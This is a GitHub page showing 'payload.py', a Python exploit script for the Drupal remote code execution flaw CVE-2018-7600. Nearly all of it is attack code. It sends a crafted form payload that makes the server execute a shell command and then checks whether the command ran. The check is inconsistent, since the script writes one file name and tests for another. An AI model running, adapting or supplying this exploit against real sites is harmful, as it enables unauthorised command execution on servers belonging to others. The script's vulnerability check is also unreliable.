-
Notifications
You must be signed in to change notification settings - Fork 7
/
payload.py
41 lines (37 loc) · 1.75 KB
/
payload.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/python2.7
'''_____________________________________________________________________
|[] R3DXPL0IT SHELL |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"|
|CODED BY > R3DXPLOIT(JIMMY) | |
|EMAIL > RETURN_ROOT@PROTONMAIL.COM | |
|GITHUB > https://github.com/r3dxpl0it | |
|WEB-PAGE > https://r3dxpl0it.Github.io |_|
|_____________________________________________________________________|/|
'''
'''
https://nvd.nist.gov/vuln/detail/CVE-2018-7600#
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
'''
import sys
import requests
def exploit(target):
pass
proxies = {}
verify = False
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "vulnerable to cve-7600-2018 exploit" | tee r3dxploit.txt'}
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
print ( '[*]' + ' requesting post')
r = requests.post(url, proxies=proxies, data=payload, verify=verify)
try:
scan = requests.get(target + 'vulnerable.txt')
if scan.status_code != 200:
print ( ' not vulnerable to cve-2018-7600 exploit \n')
if scan.status_code == 200:
print (' vulnerable to cve-2018-7600 exploit')
print (' url: ' + target + 'vulnerable.txt \n')
except requests.ConnectionError:
print (' target connection timeout')
except Exception as e :
print ('Connction Failed ' + e )
if __name__ == '__main__':
exploit(sys.argv[1])